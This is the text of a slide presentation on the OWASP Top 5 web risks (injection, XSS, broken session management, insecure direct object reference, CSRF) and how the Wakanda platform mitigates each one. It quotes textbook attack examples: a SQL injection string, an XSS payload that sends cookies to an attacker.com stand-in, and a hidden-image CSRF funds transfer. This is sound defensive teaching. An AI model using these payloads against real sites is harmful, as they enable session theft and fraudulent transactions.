Embed Size (px)
Citation preview
Wakanda and the Top 5 Security Risks
by Alexandre Morgaut
Presentation
• Wakanda Community manager
• W3C AC member
• Web Architect
• JS Expert, REST Lover, NoSQL Fanboy
• W3C “jseverywhere“ community group
@amorgaut
Agenda• The Open Web Application Security Project
• Top 10 Application Security Risks
• Zoom on Top 5
• A1 - Injection
• A2 - Cross-Site Scripting (XSS)
• A3 - Broken Authentication & Session Management
• A4 - Insecure Direct Object Reference
• A5 - Cross Site Request Forgery (CSRF)
OWASP
• The Open Web Application Security Project
• started in 2001 by Mark Curphey and Dennis Groves
• includes corporations, educational organizations, and individuals
• Cheat Sheets, Training, Books
• AppSec Conferences
• TOP 10 Security Risks
https://www.owasp.org
Top 10 Risks• A1 - Injection
• A2 - Cross-Site Scripting (XSS)
• A3 - Broken Authentication & Session Management
• A4 - Insecure Direct Object Reference
• A5 - Cross Site Request Forgery (CSRF)
• A6 - Security Misconfiguration
• A7 - Insecure Cryptographic Storage
• A8 - Failure to Restrict URL Access
• A9 - Insufficient Transport Layer Protection
• A10 - Unvalidated Redirects and Forwards
Injection
•Attacks
•SQL Injections, JS injections
• deferred Injections
SQL Injection
query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") +"'";
http://example.com/app/accountView?id=' or '1'='1
Injection• Attacks
• SQL Injections, JS injections
• deferred Injections
• Preventions
• Input check, query parameters
• Eval is Evil
• new Function() == deferred eval()
• no dynamically created JS query expression
Wakanda Security
•NoSQL
•Query parameters
•User Access Right at the Database level
•CRUD + execution Access Rights
• Restricting queries
• onRestrictingQuery handler
Cross-Site Scripting (XSS)
•Attacks
• stored, reflected, DOM based
• JS injection in the UI
XSS Attack
XSS Attack
page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>";
XSS Attack
page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>";
http://example.com/?CC='><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'.
Cross-Site Scripting (XSS)
• Attacks
• stored, reflected, DOM based
• JS injection in the UI
• Prevention
• validate any input
• escape output
Wakanda Security
• Static HTML files
•Data inclusion based on datasources
• output escaped by default
• Beware
•WYSIWYG widget + on Row Draw
• deferred effect
Broken Authentication & Session Management
•Attacks
• session fixation in URL or Form
• session hijacking
Broken Authentication & Session Management
http://example.com/sale/saleitems;jsessionid= 2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii
Broken Authentication & Session Management
• Attacks
• session fixation in URL or Form
• session hijacking
• Prevention
• check session owner
• session in HTTP only cookie
• reasonable timeout
Wakanda Security
• Session IDs managed automatically
•HTTP only restriction
•No session ID in URL or Form
•Check of user session owner
•Check of user-agent session owner
Insecure Direct Object Reference
•Attacks
• changed accessed resource URL
Insecure Direct Object Reference
query = "SELECT * FROM accts WHERE account = ?";pstmt = connection.prepareStatement(query , ... );pstmt.setString( 1, request.getparameter("acct"));results = pstmt.executeQuery( );
Insecure Direct Object Reference
query = "SELECT * FROM accts WHERE account = ?";pstmt = connection.prepareStatement(query , ... );pstmt.setString( 1, request.getparameter("acct"));results = pstmt.executeQuery( );
http://example.com/app/accountInfo?acct=notmyacct
Insecure Direct Object Reference
Insecure Direct Object Reference
•Attacks
• changed accessed resource URL
•Prevention
• Indirect resource reference
•Check all resource access rights
Wakanda Security
•Access always checked by the REST API
•User Authenticated at database level
• Restricting Queries
• Extended DataClass
•Current User or Current Group check
Cross-Site Request Forgery (CSRF)
•Attacks
•HTTP request unintentionally sent
Cross-Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF)
Transfert API
Cross-Site Request Forgery (CSRF)
http://app.com/transferFunds?amount=1500 &destAccount=4673243243
Transfert API
Cross-Site Request Forgery (CSRF)
Give a Picture URL
http://app.com/transferFunds?amount=1500 &destAccount=4673243243
Transfert API
Cross-Site Request Forgery (CSRF)
Give a Picture URL
<img src="http://app.com/transferFunds?amount=1500&destAccount=AttackerAccount#“ width="0" height="0">
http://app.com/transferFunds?amount=1500 &destAccount=4673243243
Transfert API
Cross-Site Request Forgery (CSRF)
• Attacks
• HTTP request unintentionally sent
• Prevention
• validate any input
• use URL manipulations APIs
• escape output
• use Tokens in forms
TOP 10 Risks
https://www.owasp.org/index.php/Top_10_2010-Main
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
